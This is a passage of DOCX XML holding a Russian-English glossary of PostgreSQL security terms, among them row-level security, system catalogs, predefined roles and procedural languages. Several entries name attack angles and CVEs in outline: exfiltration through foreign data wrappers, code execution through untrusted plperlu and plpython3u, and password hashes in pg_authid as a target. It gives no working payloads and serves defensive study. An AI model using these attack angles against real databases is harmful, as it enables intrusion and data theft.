          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Foreign Data Wrapper (FDW)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Mechanism для подключения внешних data sources как foreign tables. Установка через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE EXTENSION &lt;fdw_name&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (например, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">postgres_fdw</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CREATE SERVER</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USER MAPPING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FOREIGN TABLE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — стандартный flow. В attack context — SSRF / OOB exfiltration (3.6.2).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">FORCE ROW LEVEL SECURITY</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ALTER TABLE t FORCE ROW LEVEL SECURITY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — применяет RLS-policy даже к owner таблицы. Без FORCE, owner и superuser обходят RLS по умолчанию. Critical в multi-tenant deployments с SECURITY DEFINER functions от owner-roli (3.17.5).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">libpq escape functions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Семейство функций в libpq для client-side escape: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">PQescapeLiteral</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PQescapeIdentifier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PQescapeString</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PQescapeStringConn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Используются для построения SQL-строк на стороне клиента (например, в psql-обёртках). CVE-2025-1094 (R6) — bug в этих функциях при невалидном UTF-8 → SQL injection. Подробно — в 3.9.7.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Logical replication / subscription</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Mechanism для streaming row-level changes между PostgreSQL-инстансами. С PG 16 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_create_subscription</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> role. С PG 17 — больше изоляции subscription owner-а. Не главный attack vector в этой документации, но replication credentials — отдельный target.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">MERGE statement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">MERGE INTO t USING src ... WHEN MATCHED THEN UPDATE / WHEN NOT MATCHED THEN INSERT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — появился в PG 15. В PG 15.0–15.3 был баг (CVE-2023-39418, R11): MERGE не применял UPDATE/SELECT RLS policy, что позволяло INSERT-через-MERGE bypass-ить filter. Подробно — в 3.17.2.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_authid / pg_shadow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pP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 system catalog с информацией о ролях, включая </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">rolpassword</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (hash пароля). SELECT доступен только SUPERUSER. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_shadow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — view над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с same restrictions. Цель target-атак (3.8.3); на managed-провайдерах недоступен tenant-у.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_class / pg_namespace / pg_proc</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">System catalogs PostgreSQL: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 таблицы, индексы, views, sequences, materialized views; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_namespace</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — схемы;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 функции (включая stored functions, aggregates, window functions). PUBLIC по умолчанию имеет SELECT — fingerprinting через UNION (3.1.4, 3.8.1, 3.8.2).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_stat_statements</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Extension для сбора нормализованных статистик SQL-запросов: какой query сколько раз выполнялся, сколько суммарно времени, сколько rows вернул. Стандартный tool для observability. В security-context — детекция injection-паттернов (3.4, 3.6, 3.7-related queries). Detail — 5.6.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_stats / pg_stats_ext</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Views над </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_statistic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (single-column statistics) и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_statistic_ext_data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (extended / multi-column). Содержат MCV (most common values), histogram bounds, n_distinct. До CVE-2024-4317 (R17) view-фильтр на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_stats_ext</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> был неполным → leak без права SELECT на колонку. После — patch + ручной </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">fix-CVE-2024-4317.sql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в каждой БД.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">plpgsql / plperl / plperlu / plpython3u</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Procedural Languages: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plpgsql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — встроенный PL для PostgreSQL; всегда trusted. SQL-superset с control flow (LOOP, IF, BEGIN/END). Сам по себе не RCE-vector, но identifier injection в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(3.16) — основная угроза.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plperl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — trusted Perl. До CVE-2024-10979 (R7) позволял $ENV{} hijack → RCE.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plperlu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — untrusted Perl (полный Perl без sandbox). RCE через любую built-in (system, exec). Только SUPERUSER. См. 3.7.2a.</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plpython3u</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — untrusted Python без sandbox. RCE аналогично plperlu. 3.7.3.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Prepared statement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Параметризованный SQL-шаблон, сохранённый на сервере через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">PREPARE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Принимает значения через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. На уровне wire-protocol — extended query protocol использует prepared statements; на уровне SQL — explicit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">PREPARE / EXECUTE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для повторного использования планов. Главный механизм защиты от value injection — 5.1.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Predefined role</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Системные роли в PostgreSQL (с PG 14):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pg_write_all_data</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pg_monitor</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pg_read_all_settings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pg_read_all_stats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pg_execute_server_program</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pg_read_server_files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pg_write_server_files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pg_signal_backend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pg_use_reserved_connections</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (PG 16), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_create_subscription</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (PG 16), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_maintain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (PG 17). Назначаются через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GRANT pg_xxx TO role</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Заменяют необходимость в полном SUPERUSER для specific tasks. 2.2 + 5.3.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Row Level Security (RLS)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Mechanism для filter-фильтрации rows по policy. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ALTER TABLE t ENABLE ROW LEVEL SECURITY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CREATE POLICY ... USING (...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Policy вычисляется на каждом query, привязан к current_user (или к target SET ROLE). По умолчанию owner и superuser bypass-ят RLS — для применения нужен FORCE ROW LEVEL SECURITY. Подробно — 3.17.0.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
